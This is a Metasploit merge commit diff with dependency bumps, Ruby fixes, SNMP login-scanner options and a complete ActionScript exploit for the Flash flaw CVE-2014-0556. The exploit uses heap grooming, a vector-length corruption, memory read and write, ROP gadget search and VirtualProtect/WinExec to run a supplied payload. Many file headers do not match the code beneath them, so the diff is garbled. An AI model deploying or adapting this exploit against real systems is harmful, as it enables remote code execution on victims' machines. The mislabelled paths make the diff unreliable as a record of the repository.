Merge branch 'upstream/master' into multi-session-stageless

Author: OJ

Gemfile.lock

@@ -7,9 +7,9 @@ PATH
       bcrypt
       jsobfu (~> 0.2.0)
       json
-      metasploit-concern (~> 0.3.0)
+      metasploit-concern (= 0.4.0)
       metasploit-model (~> 0.29.0)
-      meterpreter_bins (= 0.0.18)
+      meterpreter_bins (= 0.0.21)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -22,9 +22,9 @@ PATH
       tzinfo
     metasploit-framework-db (4.11.0.pre.dev)
       activerecord (>= 3.2.21, < 4.0.0)
-      metasploit-credential (~> 0.14.3)
+      metasploit-credential (= 0.14.5)
       metasploit-framework (= 4.11.0.pre.dev)
-      metasploit_data_models (~> 0.23.2)
+      metasploit_data_models (= 0.24.0)
       pg (>= 0.11)
     metasploit-framework-pcap (4.11.0.pre.dev)
       metasploit-framework (= 4.11.0.pre.dev)
@@ -109,30 +109,30 @@ GEM
     mail (2.5.4)
       mime-types (~> 1.16)
       treetop (~> 1.4.8)
-    metasploit-concern (0.3.0)
+    metasploit-concern (0.4.0)
       activesupport (~> 3.0, >= 3.0.0)
       railties (< 4.0.0)
-    metasploit-credential (0.14.3)
-      metasploit-concern (~> 0.3.0)
+    metasploit-credential (0.14.5)
+      metasploit-concern (= 0.4.0)
       metasploit-model (~> 0.29.0)
-      metasploit_data_models (~> 0.23.0)
+      metasploit_data_models (= 0.24.0)
       pg
       railties (< 4.0.0)
       rubyntlm
       rubyzip (~> 1.1)
-    metasploit-model (0.29.0)
+    metasploit-model (0.29.2)
       activesupport
       railties (< 4.0.0)
-    metasploit_data_models (0.23.2)
+    metasploit_data_models (0.24.0)
       activerecord (>= 3.2.13, < 4.0.0)
       activesupport
       arel-helpers
-      metasploit-concern (~> 0.3.0)
+      metasploit-concern (= 0.4.0)
       metasploit-model (~> 0.29.0)
       pg
       railties (< 4.0.0)
       recog (~> 1.0)
-    meterpreter_bins (0.0.18)
+    meterpreter_bins (0.0.21)
     method_source (0.8.2)
     mime-types (1.25.1)
     mini_portile (0.6.2)
@@ -175,7 +175,7 @@ GEM
     rb-readline-r7 (0.5.2.0)
     rdoc (3.12.2)
       json (~> 1.4)
-    recog (1.0.24)
+    recog (1.0.27)
       nokogiri
     redcarpet (3.1.2)
     rkelly-remix (0.0.6)

data/exploits/CVE-2014-0556/msf.swf

@@ -0,0 +1,182 @@
+// Build how to:
+// 1. Download the AIRSDK, and use its compiler.
+// 2. Download the Flex SDK (4.6)
+// 3. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
+//      (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
+// 4. Build with: mxmlc -o msf.swf Main.as
+
+// Original code by @hdarwin89 // http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/
+// Modified to be used from msf
+
+package
+{
+	import flash.display.Sprite
+	import flash.display.BitmapData
+	import flash.geom.Rectangle
+	import flash.utils.ByteArray
+	import flash.display.LoaderInfo
+	import mx.utils.Base64Decoder
+
+	public class Main extends Sprite 
+	{
+		private var bv:Vector.<ByteArray> = new Vector.<ByteArray>(12800)
+		private var uv:Vector.<Object> = new Vector.<Object>(12800)
+		private var bd:BitmapData = new BitmapData(128, 16)
+		private var i:uint = 0
+
+		public function Main() 
+		{
+			var b64:Base64Decoder = new Base64Decoder()
+			b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
+			var payload:String = b64.toByteArray().toString()
+			
+			for (i = 0; i < bv.length; i++) {
+				bv[i] = new ByteArray()
+				bv[i].length = 0x2000
+				bv[i].position = 0xFFFFF000
+			}
+
+			for (i = 0; i < bv.length; i++)
+				if (i % 2 == 0) bv[i] = null
+
+			for (i = 0; i < uv.length; i++) {
+				uv[i] = new Vector.<uint>(1022)
+			}
+			
+			bd.copyPixelsToByteArray(new Rectangle(0, 0, 128, 16), bv[6401])
+			
+			for (i = 0; ; i++)
+				if (uv[i].length == 0xffffffff) break
+			
+			for (var i2:uint = 1; i2 < uv.length; i2++) {
+				if (i == i2) continue
+				uv[i2] = new Vector.<Object>(1014)
+				uv[i2][0] = bv[6401]
+				uv[i2][1] = this
+			}
+			
+			uv[i][0] = uv[i][0xfffffc03] - 0x18 + 0x1000
+			bv[6401].endian = "littleEndian"
+			bv[6401].length = 0x500000
+			var buffer:uint = vector_read(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 8) + 0x100000
+			var main:uint = uv[i][0xfffffc09] - 1
+			var vtable:uint = vector_read(main)
+			vector_write(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 8)
+			vector_write(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 16, 0xffffffff)
+			byte_write(uv[i][0] + 4, byte_read(uv[i][0] - 0x1000 + 8))
+			byte_write(uv[i][0])
+			
+			var flash:uint = base(vtable)
+			var winmm:uint = module("winmm.dll", flash)
+			var kernel32:uint = module("kernel32.dll", winmm)
+			var virtualprotect:uint = procedure("VirtualProtect", kernel32)
+			var winexec:uint = procedure("WinExec", kernel32)
+			var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash)
+			var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash)
+
+			byte_write(buffer + 0x30000, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable
+			byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main
+			byte_write(0, "\x89\x03", false) // mov [ebx], eax
+			byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+			byte_write(buffer + 0x100, payload, true)
+			byte_write(buffer + 0x20070, xchgeaxespret)
+			byte_write(buffer + 0x20000, xchgeaxesiret)
+			byte_write(0, virtualprotect)
+
+			// VirtualProtect
+			byte_write(0, winexec)
+			byte_write(0, buffer + 0x30000)
+			byte_write(0, 0x1000)
+			byte_write(0, 0x40)
+			byte_write(0, buffer + 0x80)
+
+			// WinExec
+			byte_write(0, buffer + 0x30000)
+			byte_write(0, buffer + 0x100)
+			byte_write(0)
+
+			byte_write(main, buffer + 0x20000)
+			this.toString()
+		}
+		
+		private function vector_write(addr:uint, value:uint = 0):void
+		{
+			addr > uv[i][0] ? uv[i][(addr - uv[i][0]) / 4 - 2] = value : uv[i][0xffffffff - (uv[i][0] - addr) / 4 - 1] = value
+		}
+
+		private function vector_read(addr:uint):uint
+		{
+			return addr > uv[i][0] ? uv[i][(addr - uv[i][0]) / 4 - 2] : uv[i][0xffffffff - (uv[i][0] - addr) / 4 - 1]
+		}
+		
+		private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
+		{
+			if (addr) bv[6401].position = addr
+			if (value is String) {
+				for (var i:uint; i < value.length; i++) bv[6401].writeByte(value.charCodeAt(i))
+				if (zero) bv[6401].writeByte(0)
+			} else bv[6401].writeUnsignedInt(value)
+		}
+
+		private function byte_read(addr:uint, type:String = "dword"):uint
+		{
+			bv[6401].position = addr
+			switch(type) {
+				case "dword":
+					return bv[6401].readUnsignedInt()
+				case "word":
+					return bv[6401].readUnsignedShort()
+				case "byte":
+					return bv[6401].readUnsignedByte()
+			}
+			return 0
+		}
+		
+		private function base(addr:uint):uint
+		{
+			addr &= 0xffff0000
+			while (true) {
+				if (byte_read(addr) == 0x00905a4d) return addr
+				addr -= 0x10000
+			}
+			return 0
+		}
+
+		private function module(name:String, addr:uint):uint
+		{
+			var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80), i:int = -1
+			while (true) {
+				var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
+				if (!entry) throw new Error("FAIL!");
+				bv[6401].position = addr + entry
+				if (bv[6401].readUTFBytes(name.length).toUpperCase() == name.toUpperCase()) break
+			}
+			return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)))
+		}
+
+		private function procedure(name:String, addr:uint):uint
+		{
+			var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
+			var numberOfNames:uint = byte_read(eat + 0x18)
+			var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
+			var addressOfNames:uint = addr + byte_read(eat + 0x20)
+			var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
+			for (var i:uint = 0; ; i++) {
+				var entry:uint = byte_read(addressOfNames + i * 4)
+				bv[6401].position = addr + entry
+				if (bv[6401].readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
+			}
+			return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
+		}
+
+		private function gadget(gadget:String, hint:uint, addr:uint):uint
+		{
+			var find:uint = 0
+			var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
+			var value:uint = parseInt(gadget, 16)
+			for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
+			return addr + i
+		}
+	}
+}

data/templates/template_x64_bsd.bin

@@ -96,7 +96,7 @@ def decode(c)
       when 'NameAndType'
         @info = ConstantNameAndType.decode(c)
       else
-        raise 'unkown constant tag'
+        raise 'unknown constant tag'
         return
       end
     end

external/source/exploits/CVE-2014-0556/Main.as

@@ -306,8 +306,8 @@ def label_at(edata, offset, base = '')
   # creates a new label, that is guaranteed to never be returned again as long as this object (ExeFormat) exists
   def new_label(base = '')
     base = base.dup.tr('^a-zA-Z0-9_', '_')
-    # use %x instead of to_s(16) for negative values
-    base = (base << '_uuid' << ('%08x' % base.object_id)).freeze if base.empty? or @unique_labels_cache[base]
+    # use %x with absolute value to avoid negative number formatting
+    base = (base << '_uuid' << ('%08x' % base.object_id.abs)).freeze if base.empty? or @unique_labels_cache[base]
     @unique_labels_cache[base] = true
     base
   end

lib/metasm/metasm/exe_format/javaclass.rb

@@ -32,6 +32,7 @@ module Metasploit::Framework::CommonEngine
     end
 
     config.root = Msf::Config::install_root
+    config.paths.add 'app/concerns', autoload: true
     config.paths.add 'data/meterpreter', glob: '**/ext_*'
     config.paths.add 'modules'
 

lib/metasm/metasm/main.rb

@@ -17,6 +17,40 @@ class SNMP
         PRIVATE_TYPES        = [ :password ]
         REALM_KEY            = nil
 
+        # The number of retries per community string
+        # @return [Fixnum]
+        attr_accessor :retries
+
+        # The SNMP version to scan
+        # @return [String]
+        attr_accessor :version
+
+        validates :retries,
+                  presence: true,
+                  numericality: {
+                    only_integer: true,
+                    greater_than_or_equal_to: 0
+                  }
+
+        validates :version,
+                  presence: true,
+                  inclusion: {
+                    in: ['1', '2c', 'all']
+                  }
+
+        # This method returns an array of versions to scan
+        # @return [Array] An array of versions
+        def versions
+          case version
+          when '1'
+            [:SNMPv1]
+          when '2c'
+            [:SNMPv2c]
+          when 'all'
+            [:SNMPv1, :SNMPv2c]
+          end
+        end
+
         # This method attempts a single login with a single credential against the target
         # @param credential [Credential] The credential object to attmpt to login with
         # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
@@ -29,14 +63,14 @@ def attempt_login(credential)
               service_name: 'snmp'
           }
 
-          [:SNMPv1, :SNMPv2c].each do |version|
+          versions.each do |version|
             snmp_client = ::SNMP::Manager.new(
                 :Host      => host,
                 :Port      => port,
                 :Community => credential.public,
                 :Version => version,
                 :Timeout => connection_timeout,
-                :Retries => 2,
+                :Retries => retries,
                 :Transport => ::SNMP::RexUDPTransport,
                 :Socket => ::Rex::Socket::Udp.create('Context' => { 'Msf' => framework, 'MsfExploit' => framework_module })
             )

lib/metasploit/framework/common_engine.rb

@@ -59,14 +59,15 @@ def self.optionally_active_record_railtie
         end
       end
 
-      # Tries to `require 'metasploit/credential/creation'` and include it in the `including_module`.
+      # Tries to `require 'metasploit/credential'` and include `Metasploit::Credential::Creation` in the
+      # `including_module`.
       #
       # @param including_module [Module] `Class` or `Module` that wants to `include Metasploit::Credential::Creation`.
       # @return [void]
       def self.optionally_include_metasploit_credential_creation(including_module)
         optionally(
-            'metasploit/credential/creation',
-            "metasploit-credential not in the bundle, so Metasploit::Credential creation will fail for #{including_module.name}",
+            'metasploit/credential',
+            "metasploit-credential not in the bundle, so Metasploit::Credential creation will fail for #{including_module.name}"
         ) do
           including_module.send(:include, Metasploit::Credential::Creation)
         end

lib/metasploit/framework/login_scanner/snmp.rb

@@ -1276,7 +1276,7 @@ def report_failure
   ##
 
   #
-  # The reason why the exploit was not successful (one of Msf::Exploit::FailReason)
+  # The reason why the exploit was not successful (one of Msf::Module::Failure)
   #
   attr_accessor  :fail_reason
 
@@ -1393,4 +1393,3 @@ def define_context_encoding_reqs(reqs)
 end
 
 end
-